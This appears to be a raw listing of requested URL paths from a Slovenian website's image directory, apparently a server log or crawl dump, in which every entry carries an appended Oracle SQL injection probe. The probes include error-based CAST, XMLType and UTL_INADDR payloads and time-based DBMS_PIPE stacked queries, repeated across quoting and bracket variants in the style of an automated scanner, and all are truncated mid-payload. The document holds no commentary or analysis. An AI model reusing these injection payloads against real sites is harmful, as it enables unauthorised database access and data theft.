2225. | | //slike//stran_1')) AND 3047=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)/ |
2226. | | //slike//stran_1' AND 3047=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)/ |
2227. | | //slike//stran_1') AND 3047=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)/ |
2228. | | //slike//stran_1%' AND 3047=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)/ |
2229. | | //slike//stran_1' AND 3047=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)/ |
2230. | | //slike//stran_1") AND 3047=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)/ |
2231. | | //slike//stran_1" AND 3047=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)/ |
2232. | | //slike//stran_-7965) OR 4558=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)/ |
2233. | | //slike//stran_-5589)) OR 4558=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)/ |
2234. | | //slike//stran_-9312 OR 4558=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)/ |
2235. | | //slike//stran_-7843 OR 4558=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)/ |
2236. | | //slike//stran_-6747') OR 4558=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)/ |
2237. | | //slike//stran_-3804')) OR 4558=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)/ |
2238. | | //slike//stran_-2053' OR 4558=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)/ |
2239. | | //slike//stran_-1780') OR 4558=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)/ |
2240. | | //slike//stran_-4112%' OR 4558=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)/ |
2241. | | //slike//stran_-4001' OR 4558=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)/ |
2242. | | //slike//stran_-9481") OR 4558=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)/ |
2243. | | //slike//stran_-8376" OR 4558=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)/ |
2244. | | //slike//stran_(CAST((CHR(113)/ |
2245. | | //slike//stran_(SELECT (CHR(113)/ |
2246. | | //slike//stran_(SELECT CHR(113)/ |
2247. | | //slike//stran_1);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)/ |
2248. | | //slike//stran_1));SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)/ |
2249. | | //slike//stran_1;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)/ |
2250. | | //slike//stran_1');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)/ |
2251. | | //slike//stran_1'));SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)/ |
2252. | | //slike//stran_1';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)/ |
2253. | | //slike//stran_1%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)/ |
2254. | | //slike//stran_1");SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)/ |
2255. | | //slike//stran_1";SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)/ |
2256. | | balance.gif) and (select (case when (3040=7075) then null else cast((chr(97) //slike//stran_1/balance.gif) and (select (case when (3040=7075) then null else cast((chr(97) |
2257. | | balance.gif) and (select (case when (3325=3325) then null else cast((chr(69) //slike//stran_1/balance.gif) and (select (case when (3325=3325) then null else cast((chr(69) |
2258. | | balance.gif)) and (select (case when (3699=9486) then null else cast((chr(70) //slike//stran_1/balance.gif)) and (select (case when (3699=9486) then null else cast((chr(70) |
2259. | | balance.gif)) and (select (case when (3325=3325) then null else cast((chr(69) //slike//stran_1/balance.gif)) and (select (case when (3325=3325) then null else cast((chr(69) |
2260. | | balance.gif and (select (case when (3957=9765) then null else cast((chr(68) //slike//stran_1/balance.gif and (select (case when (3957=9765) then null else cast((chr(68) |
2261. | | balance.gif and (select (case when (3325=3325) then null else cast((chr(69) //slike//stran_1/balance.gif and (select (case when (3325=3325) then null else cast((chr(69) |
2262. | | balance.gif') and (select (case when (1977=4180) then null else cast((chr(112) //slike//stran_1/balance.gif') and (select (case when (1977=4180) then null else cast((chr(112) |
2263. | | balance.gif') and (select (case when (3325=3325) then null else cast((chr(69) //slike//stran_1/balance.gif') and (select (case when (3325=3325) then null else cast((chr(69) |
2264. | | balance.gif')) and (select (case when (2233=4046) then null else cast((chr(66) //slike//stran_1/balance.gif')) and (select (case when (2233=4046) then null else cast((chr(66) |
2265. | | balance.gif')) and (select (case when (3325=3325) then null else cast((chr(69) //slike//stran_1/balance.gif')) and (select (case when (3325=3325) then null else cast((chr(69) |
2266. | | balance.gif' and (select (case when (1540=2796) then null else cast((chr(74) //slike//stran_1/balance.gif' and (select (case when (1540=2796) then null else cast((chr(74) |
2267. | | balance.gif' and (select (case when (3325=3325) then null else cast((chr(69) //slike//stran_1/balance.gif' and (select (case when (3325=3325) then null else cast((chr(69) |
2268. | | balance.gif') and (select (case when (2196=5606) then null else cast((chr(67) //slike//stran_1/balance.gif') and (select (case when (2196=5606) then null else cast((chr(67) |
2269. | | balance.gif') and (select (case when (3325=3325) then null else cast((chr(69) //slike//stran_1/balance.gif') and (select (case when (3325=3325) then null else cast((chr(69) |
2270. | | balance.gif%' and (select (case when (1721=8463) then null else cast((chr(104) //slike//stran_1/balance.gif%' and (select (case when (1721=8463) then null else cast((chr(104) |
2271. | | balance.gif%' and (select (case when (3325=3325) then null else cast((chr(69) //slike//stran_1/balance.gif%' and (select (case when (3325=3325) then null else cast((chr(69) |
2272. | | balance.gif' and (select (case when (9429=6414) then null else cast((chr(85) //slike//stran_1/balance.gif' and (select (case when (9429=6414) then null else cast((chr(85) |
2273. | | balance.gif' and (select (case when (3325=3325) then null else cast((chr(69) //slike//stran_1/balance.gif' and (select (case when (3325=3325) then null else cast((chr(69) |
2274. | | balance.gif") and (select (case when (9998=1049) then null else cast((chr(80) //slike//stran_1/balance.gif") and (select (case when (9998=1049) then null else cast((chr(80) |
2275. | | balance.gif") and (select (case when (3325=3325) then null else cast((chr(69) //slike//stran_1/balance.gif") and (select (case when (3325=3325) then null else cast((chr(69) |
2276. | | balance.gif" and (select (case when (4886=2154) then null else cast((chr(81) //slike//stran_1/balance.gif" and (select (case when (4886=2154) then null else cast((chr(81) |
2277. | | balance.gif" and (select (case when (3325=3325) then null else cast((chr(69) //slike//stran_1/balance.gif" and (select (case when (3325=3325) then null else cast((chr(69) |
2278. | | balance.gif and (select (case when (1628=8460) then null else cast((chr(66) //slike//stran_1/balance.gif and (select (case when (1628=8460) then null else cast((chr(66) |
2279. | | balance.gif and (select (case when (3325=3325) then null else cast((chr(69) //slike//stran_1/balance.gif and (select (case when (3325=3325) then null else cast((chr(69) |
2280. | | balance.gif) and 9598=cast((chr(113) //slike//stran_1/balance.gif) and 9598=cast((chr(113) |
2281. | | balance.gif)) and 9598=cast((chr(113) //slike//stran_1/balance.gif)) and 9598=cast((chr(113) |
2282. | | balance.gif and 9598=cast((chr(113) //slike//stran_1/balance.gif and 9598=cast((chr(113) |
2283. | | balance.gif') and 9598=cast((chr(113) //slike//stran_1/balance.gif') and 9598=cast((chr(113) |
2284. | | balance.gif')) and 9598=cast((chr(113) //slike//stran_1/balance.gif')) and 9598=cast((chr(113) |
2285. | | balance.gif' and 9598=cast((chr(113) //slike//stran_1/balance.gif' and 9598=cast((chr(113) |
2286. | | balance.gif') and 9598=cast((chr(113) //slike//stran_1/balance.gif') and 9598=cast((chr(113) |
2287. | | balance.gif%' and 9598=cast((chr(113) //slike//stran_1/balance.gif%' and 9598=cast((chr(113) |
2288. | | balance.gif' and 9598=cast((chr(113) //slike//stran_1/balance.gif' and 9598=cast((chr(113) |
2289. | | balance.gif") and 9598=cast((chr(113) //slike//stran_1/balance.gif") and 9598=cast((chr(113) |
2290. | | balance.gif" and 9598=cast((chr(113) //slike//stran_1/balance.gif" and 9598=cast((chr(113) |
2291. | | balance.gif and 9598=cast((chr(113) //slike//stran_1/balance.gif and 9598=cast((chr(113) |
2292. | | -7756) or 2693=cast((chr(113) //slike//stran_1/-7756) or 2693=cast((chr(113) |
2293. | | -5823)) or 2693=cast((chr(113) //slike//stran_1/-5823)) or 2693=cast((chr(113) |
2294. | | -7397 or 2693=cast((chr(113) //slike//stran_1/-7397 or 2693=cast((chr(113) |
2295. | | -3641') or 2693=cast((chr(113) //slike//stran_1/-3641') or 2693=cast((chr(113) |
2296. | | -3296')) or 2693=cast((chr(113) //slike//stran_1/-3296')) or 2693=cast((chr(113) |
2297. | | -9649' or 2693=cast((chr(113) //slike//stran_1/-9649' or 2693=cast((chr(113) |
2298. | | -1145') or 2693=cast((chr(113) //slike//stran_1/-1145') or 2693=cast((chr(113) |
2299. | | -9288%' or 2693=cast((chr(113) //slike//stran_1/-9288%' or 2693=cast((chr(113) |
2300. | | -9406' or 2693=cast((chr(113) //slike//stran_1/-9406' or 2693=cast((chr(113) |
2301. | | -9801") or 2693=cast((chr(113) //slike//stran_1/-9801") or 2693=cast((chr(113) |
2302. | | -5663" or 2693=cast((chr(113) //slike//stran_1/-5663" or 2693=cast((chr(113) |
2303. | | -3035 or 2693=cast((chr(113) //slike//stran_1/-3035 or 2693=cast((chr(113) |
2304. | | balance.gif) and 6160=(select upper(xmltype(chr(60) //slike//stran_1/balance.gif) and 6160=(select upper(xmltype(chr(60) |
2305. | | balance.gif)) and 6160=(select upper(xmltype(chr(60) //slike//stran_1/balance.gif)) and 6160=(select upper(xmltype(chr(60) |
2306. | | balance.gif and 6160=(select upper(xmltype(chr(60) //slike//stran_1/balance.gif and 6160=(select upper(xmltype(chr(60) |
2307. | | balance.gif') and 6160=(select upper(xmltype(chr(60) //slike//stran_1/balance.gif') and 6160=(select upper(xmltype(chr(60) |
2308. | | balance.gif')) and 6160=(select upper(xmltype(chr(60) //slike//stran_1/balance.gif')) and 6160=(select upper(xmltype(chr(60) |
2309. | | balance.gif' and 6160=(select upper(xmltype(chr(60) //slike//stran_1/balance.gif' and 6160=(select upper(xmltype(chr(60) |
2310. | | balance.gif') and 6160=(select upper(xmltype(chr(60) //slike//stran_1/balance.gif') and 6160=(select upper(xmltype(chr(60) |
2311. | | balance.gif%' and 6160=(select upper(xmltype(chr(60) //slike//stran_1/balance.gif%' and 6160=(select upper(xmltype(chr(60) |
2312. | | balance.gif' and 6160=(select upper(xmltype(chr(60) //slike//stran_1/balance.gif' and 6160=(select upper(xmltype(chr(60) |
2313. | | balance.gif") and 6160=(select upper(xmltype(chr(60) //slike//stran_1/balance.gif") and 6160=(select upper(xmltype(chr(60) |
2314. | | balance.gif" and 6160=(select upper(xmltype(chr(60) //slike//stran_1/balance.gif" and 6160=(select upper(xmltype(chr(60) |
2315. | | balance.gif and 6160=(select upper(xmltype(chr(60) //slike//stran_1/balance.gif and 6160=(select upper(xmltype(chr(60) |
2316. | | -3447) or 5759=(select upper(xmltype(chr(60) //slike//stran_1/-3447) or 5759=(select upper(xmltype(chr(60) |
2317. | | -8605)) or 5759=(select upper(xmltype(chr(60) //slike//stran_1/-8605)) or 5759=(select upper(xmltype(chr(60) |
2318. | | -7377 or 5759=(select upper(xmltype(chr(60) //slike//stran_1/-7377 or 5759=(select upper(xmltype(chr(60) |
2319. | | -4352') or 5759=(select upper(xmltype(chr(60) //slike//stran_1/-4352') or 5759=(select upper(xmltype(chr(60) |
2320. | | -3030')) or 5759=(select upper(xmltype(chr(60) //slike//stran_1/-3030')) or 5759=(select upper(xmltype(chr(60) |
2321. | | -8435' or 5759=(select upper(xmltype(chr(60) //slike//stran_1/-8435' or 5759=(select upper(xmltype(chr(60) |
2322. | | -2000') or 5759=(select upper(xmltype(chr(60) //slike//stran_1/-2000') or 5759=(select upper(xmltype(chr(60) |
2323. | | -4086%' or 5759=(select upper(xmltype(chr(60) //slike//stran_1/-4086%' or 5759=(select upper(xmltype(chr(60) |
2324. | | -2858' or 5759=(select upper(xmltype(chr(60) //slike//stran_1/-2858' or 5759=(select upper(xmltype(chr(60) |
2325. | | -7490") or 5759=(select upper(xmltype(chr(60) //slike//stran_1/-7490") or 5759=(select upper(xmltype(chr(60) |
2326. | | -9750" or 5759=(select upper(xmltype(chr(60) //slike//stran_1/-9750" or 5759=(select upper(xmltype(chr(60) |
2327. | | -9505 or 5759=(select upper(xmltype(chr(60) //slike//stran_1/-9505 or 5759=(select upper(xmltype(chr(60) |
2328. | | balance.gif) and 6147=utl_inaddr.get_host_address(chr(113) //slike//stran_1/balance.gif) and 6147=utl_inaddr.get_host_address(chr(113) |
2329. | | balance.gif)) and 6147=utl_inaddr.get_host_address(chr(113) //slike//stran_1/balance.gif)) and 6147=utl_inaddr.get_host_address(chr(113) |
2330. | | balance.gif and 6147=utl_inaddr.get_host_address(chr(113) //slike//stran_1/balance.gif and 6147=utl_inaddr.get_host_address(chr(113) |
2331. | | balance.gif') and 6147=utl_inaddr.get_host_address(chr(113) //slike//stran_1/balance.gif') and 6147=utl_inaddr.get_host_address(chr(113) |
2332. | | balance.gif')) and 6147=utl_inaddr.get_host_address(chr(113) //slike//stran_1/balance.gif')) and 6147=utl_inaddr.get_host_address(chr(113) |
2333. | | balance.gif' and 6147=utl_inaddr.get_host_address(chr(113) //slike//stran_1/balance.gif' and 6147=utl_inaddr.get_host_address(chr(113) |
2334. | | balance.gif') and 6147=utl_inaddr.get_host_address(chr(113) //slike//stran_1/balance.gif') and 6147=utl_inaddr.get_host_address(chr(113) |
2335. | | balance.gif%' and 6147=utl_inaddr.get_host_address(chr(113) //slike//stran_1/balance.gif%' and 6147=utl_inaddr.get_host_address(chr(113) |
2336. | | balance.gif' and 6147=utl_inaddr.get_host_address(chr(113) //slike//stran_1/balance.gif' and 6147=utl_inaddr.get_host_address(chr(113) |
2337. | | balance.gif") and 6147=utl_inaddr.get_host_address(chr(113) //slike//stran_1/balance.gif") and 6147=utl_inaddr.get_host_address(chr(113) |
2338. | | balance.gif" and 6147=utl_inaddr.get_host_address(chr(113) //slike//stran_1/balance.gif" and 6147=utl_inaddr.get_host_address(chr(113) |
2339. | | balance.gif and 6147=utl_inaddr.get_host_address(chr(113) //slike//stran_1/balance.gif and 6147=utl_inaddr.get_host_address(chr(113) |
2340. | | -4869) or 3774=utl_inaddr.get_host_address(chr(113) //slike//stran_1/-4869) or 3774=utl_inaddr.get_host_address(chr(113) |
2341. | | -6472)) or 3774=utl_inaddr.get_host_address(chr(113) //slike//stran_1/-6472)) or 3774=utl_inaddr.get_host_address(chr(113) |
2342. | | -6486 or 3774=utl_inaddr.get_host_address(chr(113) //slike//stran_1/-6486 or 3774=utl_inaddr.get_host_address(chr(113) |
2343. | | -6524') or 3774=utl_inaddr.get_host_address(chr(113) //slike//stran_1/-6524') or 3774=utl_inaddr.get_host_address(chr(113) |
2344. | | -6682')) or 3774=utl_inaddr.get_host_address(chr(113) //slike//stran_1/-6682')) or 3774=utl_inaddr.get_host_address(chr(113) |
2345. | | -1932' or 3774=utl_inaddr.get_host_address(chr(113) //slike//stran_1/-1932' or 3774=utl_inaddr.get_host_address(chr(113) |
2346. | | -5429') or 3774=utl_inaddr.get_host_address(chr(113) //slike//stran_1/-5429') or 3774=utl_inaddr.get_host_address(chr(113) |
2347. | | -3234%' or 3774=utl_inaddr.get_host_address(chr(113) //slike//stran_1/-3234%' or 3774=utl_inaddr.get_host_address(chr(113) |
2348. | | -3427' or 3774=utl_inaddr.get_host_address(chr(113) //slike//stran_1/-3427' or 3774=utl_inaddr.get_host_address(chr(113) |
2349. | | -6526") or 3774=utl_inaddr.get_host_address(chr(113) //slike//stran_1/-6526") or 3774=utl_inaddr.get_host_address(chr(113) |
2350. | | -4693" or 3774=utl_inaddr.get_host_address(chr(113) //slike//stran_1/-4693" or 3774=utl_inaddr.get_host_address(chr(113) |
2351. | | -8837 or 3774=utl_inaddr.get_host_address(chr(113) //slike//stran_1/-8837 or 3774=utl_inaddr.get_host_address(chr(113) |
2352. | | (select (chr(113) //slike//stran_1/(select (chr(113) |
2353. | | (select chr(113) //slike//stran_1/(select chr(113) |
2354. | | balance.gif);select dbms_pipe.receive_message(chr(68) //slike//stran_1/balance.gif);select dbms_pipe.receive_message(chr(68) |
2355. | | balance.gif));select dbms_pipe.receive_message(chr(68) //slike//stran_1/balance.gif));select dbms_pipe.receive_message(chr(68) |
2356. | | balance.gif;select dbms_pipe.receive_message(chr(68) //slike//stran_1/balance.gif;select dbms_pipe.receive_message(chr(68) |
2357. | | balance.gif');select dbms_pipe.receive_message(chr(68) //slike//stran_1/balance.gif');select dbms_pipe.receive_message(chr(68) |
2358. | | balance.gif'));select dbms_pipe.receive_message(chr(68) //slike//stran_1/balance.gif'));select dbms_pipe.receive_message(chr(68) |
2359. | | balance.gif';select dbms_pipe.receive_message(chr(68) //slike//stran_1/balance.gif';select dbms_pipe.receive_message(chr(68) |
2360. | | balance.gif%';select dbms_pipe.receive_message(chr(68) //slike//stran_1/balance.gif%';select dbms_pipe.receive_message(chr(68) |
2361. | | balance.gif");select dbms_pipe.receive_message(chr(68) //slike//stran_1/balance.gif");select dbms_pipe.receive_message(chr(68) |
2362. | | balance.gif";select dbms_pipe.receive_message(chr(68) //slike//stran_1/balance.gif";select dbms_pipe.receive_message(chr(68) |
2363. | | //slike//stran_5) AND 7234=CAST((CHR(113)/ |
2364. | | //slike//stran_5)) AND 7234=CAST((CHR(113)/ |
2365. | | //slike//stran_5 AND 7234=CAST((CHR(113)/ |
2366. | | //slike//stran_5 AND 7234=CAST((CHR(113)/ |
2367. | | //slike//stran_5') AND 7234=CAST((CHR(113)/ |
2368. | | //slike//stran_5')) AND 7234=CAST((CHR(113)/ |
2369. | | //slike//stran_5' AND 7234=CAST((CHR(113)/ |
2370. | | //slike//stran_5') AND 7234=CAST((CHR(113)/ |
2371. | | //slike//stran_5%' AND 7234=CAST((CHR(113)/ |
2372. | | //slike//stran_5' AND 7234=CAST((CHR(113)/ |
2373. | | //slike//stran_5") AND 7234=CAST((CHR(113)/ |
2374. | | //slike//stran_5" AND 7234=CAST((CHR(113)/ |
2375. | | //slike//stran_5) AND 1870=(SELECT UPPER(XMLType(CHR(60)/ |
2376. | | //slike//stran_5)) AND 1870=(SELECT UPPER(XMLType(CHR(60)/ |
2377. | | //slike//stran_5 AND 1870=(SELECT UPPER(XMLType(CHR(60)/ |
2378. | | //slike//stran_5 AND 1870=(SELECT UPPER(XMLType(CHR(60)/ |
2379. | | //slike//stran_5') AND 1870=(SELECT UPPER(XMLType(CHR(60)/ |
2380. | | //slike//stran_5')) AND 1870=(SELECT UPPER(XMLType(CHR(60)/ |
2381. | | //slike//stran_5' AND 1870=(SELECT UPPER(XMLType(CHR(60)/ |
2382. | | //slike//stran_5') AND 1870=(SELECT UPPER(XMLType(CHR(60)/ |
2383. | | //slike//stran_5%' AND 1870=(SELECT UPPER(XMLType(CHR(60)/ |
2384. | | //slike//stran_5' AND 1870=(SELECT UPPER(XMLType(CHR(60)/ |
2385. | | //slike//stran_5") AND 1870=(SELECT UPPER(XMLType(CHR(60)/ |
2386. | | //slike//stran_5" AND 1870=(SELECT UPPER(XMLType(CHR(60)/ |
2387. | | //slike//stran_5) AND 9043=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)/ |
2388. | | //slike//stran_5)) AND 9043=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)/ |
2389. | | //slike//stran_5 AND 9043=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)/ |
2390. | | //slike//stran_5 AND 9043=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)/ |
2391. | | //slike//stran_5') AND 9043=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)/ |
2392. | | //slike//stran_5')) AND 9043=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)/ |
2393. | | //slike//stran_5' AND 9043=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)/ |
2394. | | //slike//stran_5') AND 9043=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)/ |
2395. | | //slike//stran_5%' AND 9043=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)/ |
2396. | | //slike//stran_5' AND 9043=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)/ |
2397. | | //slike//stran_5") AND 9043=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)/ |
2398. | | //slike//stran_5" AND 9043=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)/ |
2399. | | //slike//stran_(CAST((CHR(113)/ |
2400. | | //slike//stran_(SELECT (CHR(113)/ |
2401. | | //slike//stran_(SELECT CHR(113)/ |
2402. | | //slike//stran_5);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)/ |
2403. | | //slike//stran_5));SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)/ |
2404. | | //slike//stran_5;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)/ |
2405. | | //slike//stran_5');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)/ |
2406. | | //slike//stran_5'));SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)/ |
2407. | | //slike//stran_5';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)/ |
2408. | | //slike//stran_5%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)/ |
2409. | | //slike//stran_5");SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)/ |
2410. | | //slike//stran_5";SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)/ |
2411. | | prepovedano.gif) and 1548=cast((chr(113) //slike//stran_5/prepovedano.gif) and 1548=cast((chr(113) |
2412. | | prepovedano.gif)) and 1548=cast((chr(113) //slike//stran_5/prepovedano.gif)) and 1548=cast((chr(113) |
2413. | | prepovedano.gif and 1548=cast((chr(113) //slike//stran_5/prepovedano.gif and 1548=cast((chr(113) |
2414. | | prepovedano.gif') and 1548=cast((chr(113) //slike//stran_5/prepovedano.gif') and 1548=cast((chr(113) |
2415. | | prepovedano.gif')) and 1548=cast((chr(113) //slike//stran_5/prepovedano.gif')) and 1548=cast((chr(113) |
2416. | | prepovedano.gif' and 1548=cast((chr(113) //slike//stran_5/prepovedano.gif' and 1548=cast((chr(113) |
2417. | | prepovedano.gif') and 1548=cast((chr(113) //slike//stran_5/prepovedano.gif') and 1548=cast((chr(113) |
2418. | | prepovedano.gif%' and 1548=cast((chr(113) //slike//stran_5/prepovedano.gif%' and 1548=cast((chr(113) |
2419. | | prepovedano.gif' and 1548=cast((chr(113) //slike//stran_5/prepovedano.gif' and 1548=cast((chr(113) |
2420. | | prepovedano.gif") and 1548=cast((chr(113) //slike//stran_5/prepovedano.gif") and 1548=cast((chr(113) |
2421. | | prepovedano.gif" and 1548=cast((chr(113) //slike//stran_5/prepovedano.gif" and 1548=cast((chr(113) |
2422. | | prepovedano.gif and 1548=cast((chr(113) //slike//stran_5/prepovedano.gif and 1548=cast((chr(113) |
2423. | | prepovedano.gif) and 3300=(select upper(xmltype(chr(60) //slike//stran_5/prepovedano.gif) and 3300=(select upper(xmltype(chr(60) |
2424. | | prepovedano.gif)) and 3300=(select upper(xmltype(chr(60) //slike//stran_5/prepovedano.gif)) and 3300=(select upper(xmltype(chr(60) |
2425. | | prepovedano.gif and 3300=(select upper(xmltype(chr(60) //slike//stran_5/prepovedano.gif and 3300=(select upper(xmltype(chr(60) |
2426. | | prepovedano.gif') and 3300=(select upper(xmltype(chr(60) //slike//stran_5/prepovedano.gif') and 3300=(select upper(xmltype(chr(60) |
2427. | | prepovedano.gif')) and 3300=(select upper(xmltype(chr(60) //slike//stran_5/prepovedano.gif')) and 3300=(select upper(xmltype(chr(60) |
2428. | | prepovedano.gif' and 3300=(select upper(xmltype(chr(60) //slike//stran_5/prepovedano.gif' and 3300=(select upper(xmltype(chr(60) |
2429. | | prepovedano.gif') and 3300=(select upper(xmltype(chr(60) //slike//stran_5/prepovedano.gif') and 3300=(select upper(xmltype(chr(60) |
2430. | | prepovedano.gif%' and 3300=(select upper(xmltype(chr(60) //slike//stran_5/prepovedano.gif%' and 3300=(select upper(xmltype(chr(60) |
2431. | | prepovedano.gif' and 3300=(select upper(xmltype(chr(60) //slike//stran_5/prepovedano.gif' and 3300=(select upper(xmltype(chr(60) |
2432. | | prepovedano.gif") and 3300=(select upper(xmltype(chr(60) //slike//stran_5/prepovedano.gif") and 3300=(select upper(xmltype(chr(60) |
2433. | | prepovedano.gif" and 3300=(select upper(xmltype(chr(60) //slike//stran_5/prepovedano.gif" and 3300=(select upper(xmltype(chr(60) |
2434. | | prepovedano.gif and 3300=(select upper(xmltype(chr(60) //slike//stran_5/prepovedano.gif and 3300=(select upper(xmltype(chr(60) |
2435. | | prepovedano.gif) and 1175=utl_inaddr.get_host_address(chr(113) //slike//stran_5/prepovedano.gif) and 1175=utl_inaddr.get_host_address(chr(113) |
2436. | | prepovedano.gif)) and 1175=utl_inaddr.get_host_address(chr(113) //slike//stran_5/prepovedano.gif)) and 1175=utl_inaddr.get_host_address(chr(113) |
2437. | | prepovedano.gif and 1175=utl_inaddr.get_host_address(chr(113) //slike//stran_5/prepovedano.gif and 1175=utl_inaddr.get_host_address(chr(113) |
2438. | | prepovedano.gif') and 1175=utl_inaddr.get_host_address(chr(113) //slike//stran_5/prepovedano.gif') and 1175=utl_inaddr.get_host_address(chr(113) |
2439. | | prepovedano.gif')) and 1175=utl_inaddr.get_host_address(chr(113) //slike//stran_5/prepovedano.gif')) and 1175=utl_inaddr.get_host_address(chr(113) |
2440. | | prepovedano.gif' and 1175=utl_inaddr.get_host_address(chr(113) //slike//stran_5/prepovedano.gif' and 1175=utl_inaddr.get_host_address(chr(113) |
2441. | | prepovedano.gif') and 1175=utl_inaddr.get_host_address(chr(113) //slike//stran_5/prepovedano.gif') and 1175=utl_inaddr.get_host_address(chr(113) |
2442. | | prepovedano.gif%' and 1175=utl_inaddr.get_host_address(chr(113) //slike//stran_5/prepovedano.gif%' and 1175=utl_inaddr.get_host_address(chr(113) |
2443. | | prepovedano.gif' and 1175=utl_inaddr.get_host_address(chr(113) //slike//stran_5/prepovedano.gif' and 1175=utl_inaddr.get_host_address(chr(113) |
2444. | | prepovedano.gif") and 1175=utl_inaddr.get_host_address(chr(113) //slike//stran_5/prepovedano.gif") and 1175=utl_inaddr.get_host_address(chr(113) |
2445. | | prepovedano.gif" and 1175=utl_inaddr.get_host_address(chr(113) //slike//stran_5/prepovedano.gif" and 1175=utl_inaddr.get_host_address(chr(113) |
2446. | | prepovedano.gif and 1175=utl_inaddr.get_host_address(chr(113) //slike//stran_5/prepovedano.gif and 1175=utl_inaddr.get_host_address(chr(113) |
2447. | | (select (chr(113) //slike//stran_5/(select (chr(113) |
2448. | | (select chr(113) //slike//stran_5/(select chr(113) |
2449. | | prepovedano.gif);select dbms_pipe.receive_message(chr(78) //slike//stran_5/prepovedano.gif);select dbms_pipe.receive_message(chr(78) |
2450. | | prepovedano.gif));select dbms_pipe.receive_message(chr(78) //slike//stran_5/prepovedano.gif));select dbms_pipe.receive_message(chr(78) |
2451. | | prepovedano.gif;select dbms_pipe.receive_message(chr(78) //slike//stran_5/prepovedano.gif;select dbms_pipe.receive_message(chr(78) |
2452. | | prepovedano.gif');select dbms_pipe.receive_message(chr(78) //slike//stran_5/prepovedano.gif');select dbms_pipe.receive_message(chr(78) |
2453. | | prepovedano.gif'));select dbms_pipe.receive_message(chr(78) //slike//stran_5/prepovedano.gif'));select dbms_pipe.receive_message(chr(78) |
2454. | | prepovedano.gif';select dbms_pipe.receive_message(chr(78) //slike//stran_5/prepovedano.gif';select dbms_pipe.receive_message(chr(78) |
2455. | | prepovedano.gif%';select dbms_pipe.receive_message(chr(78) //slike//stran_5/prepovedano.gif%';select dbms_pipe.receive_message(chr(78) |
2456. | | prepovedano.gif");select dbms_pipe.receive_message(chr(78) //slike//stran_5/prepovedano.gif");select dbms_pipe.receive_message(chr(78) |
2457. | | prepovedano.gif";select dbms_pipe.receive_message(chr(78) //slike//stran_5/prepovedano.gif";select dbms_pipe.receive_message(chr(78) |
2458. | | balance.gif) and 7447=cast((chr(113) //slike//stran_1 AND 5486/balance.gif) and 7447=cast((chr(113) |
2459. | | balance.gif)) and 7447=cast((chr(113) //slike//stran_1 AND 5486/balance.gif)) and 7447=cast((chr(113) |
2460. | | balance.gif and 7447=cast((chr(113) //slike//stran_1 AND 5486/balance.gif and 7447=cast((chr(113) |
2461. | | balance.gif') and 7447=cast((chr(113) //slike//stran_1 AND 5486/balance.gif') and 7447=cast((chr(113) |
2462. | | balance.gif')) and 7447=cast((chr(113) //slike//stran_1 AND 5486/balance.gif')) and 7447=cast((chr(113) |
2463. | | balance.gif' and 7447=cast((chr(113) //slike//stran_1 AND 5486/balance.gif' and 7447=cast((chr(113) |
2464. | | balance.gif') and 7447=cast((chr(113) //slike//stran_1 AND 5486/balance.gif') and 7447=cast((chr(113) |
2465. | | balance.gif%' and 7447=cast((chr(113) //slike//stran_1 AND 5486/balance.gif%' and 7447=cast((chr(113) |
2466. | | balance.gif' and 7447=cast((chr(113) //slike//stran_1 AND 5486/balance.gif' and 7447=cast((chr(113) |
2467. | | balance.gif") and 7447=cast((chr(113) //slike//stran_1 AND 5486/balance.gif") and 7447=cast((chr(113) |
2468. | | balance.gif" and 7447=cast((chr(113) //slike//stran_1 AND 5486/balance.gif" and 7447=cast((chr(113) |
2469. | | balance.gif and 7447=cast((chr(113) //slike//stran_1 AND 5486/balance.gif and 7447=cast((chr(113) |
2470. | | balance.gif) and 8884=(select upper(xmltype(chr(60) //slike//stran_1 AND 5486/balance.gif) and 8884=(select upper(xmltype(chr(60) |
